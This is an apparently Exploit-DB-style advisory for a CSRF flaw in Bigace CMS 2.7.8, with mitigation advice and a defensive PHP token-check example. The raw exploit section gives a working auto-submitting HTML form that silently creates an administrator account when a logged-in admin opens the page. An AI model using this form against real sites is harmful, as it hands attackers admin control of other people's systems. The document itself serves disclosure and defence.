Vendor: Bigace CMS
By: Yashar shahinzadeh
CVSS: 7.5 (HIGH)
Type: CSRF
CWE: 352
Product Name: Bigace CMS
Affected Version From: 2.7.8
Affected Version To: 2.7.8
Patch Exists: NO
Related CWE: N/A
CPE: a:bigace:bigace_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux & Windows, PHP 5.2.9
2013

Bigace CMS CSRF – Adding an admin account

A CSRF vulnerability exists in Bigace CMS that allows an attacker to add an admin account by sending a malicious link to the victim. The linked page contains a form with pre-filled values for the userName, language, userGroups, state, email, passwordnew and passwordcheck fields. When the victim visits the link, the form is submitted automatically and an admin account is created.

Mitigation:

The application should verify that the request was actually issued by the authenticated user and was not forged by an attacker. It should also include a random token in the form, and check that token on submission, to prevent CSRF attacks.
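
One way to implement the token check described above, as an added example that is not Bigace code or the advisory author's code. It assumes PHP 7+ (for random_bytes and hash_equals) and a session-based admin login; the function names, the csrf_token field and the host names are hypothetical.

```php
<?php
// Added example, not Bigace code. Names and hosts below are hypothetical.

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Decide whether a state-changing request (e.g. user creation) may proceed. */
function csrf_check(array $session, array $server, array $post, string $ownHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // never change state on GET
    }
    // If the browser sent an Origin header, it must name our own host.
    if (isset($server['HTTP_ORIGIN'])
        && parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST) !== $ownHost) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Constant-time comparison; a missing or empty token always fails.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// --- Constructed sample requests against the user-creation handler ---
$session = ['user' => 'admin'];   // logged-in administrator
$token   = csrf_token($session);  // embedded as a hidden input in the real admin form

// Fields as a cross-site form sends them: the session cookie rides along, but no token.
$forged       = ['userName' => 'x', 'userGroups' => ['40'],
                 'passwordnew' => 'p', 'passwordcheck' => 'p'];
$forgedServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other.example'];

// The same fields submitted from the genuine admin form, token included.
$legit       = $forged + ['csrf_token' => $token];
$legitServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://cms.example'];

var_dump(csrf_check($session, $forgedServer, $forged, 'cms.example')); // cross-site request
var_dump(csrf_check($session, $legitServer, $legit, 'cms.example'));   // genuine admin form
```

The handler would call csrf_check() before processing any field of the user-creation POST and stop with an error response when it returns false.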

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Bigace CMS CSRF - Adding  an admin account
# Date: 2013 29 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://www.bigace.de/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 2.7.8
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Adding an admin account
 

1. CSRF - Adding an admin account:
==================================

<html>
<body>
<form name="myForm" id="myForm"
      action="[Path to Bigace CMS]/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create" method="post">
    <input type="hidden" name="userName" value="yashar">
    <input type="hidden" name="language" value="en">
    <input type="hidden" name="userGroups[]" value="40">
    <input type="hidden" name="state" value="1">
    <input type="hidden" name="email" value="yashar@yashar.com">
    <input type="hidden" name="passwordnew" value="yashar">
    <input type="hidden" name="passwordcheck" value="yashar">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</body>
</html>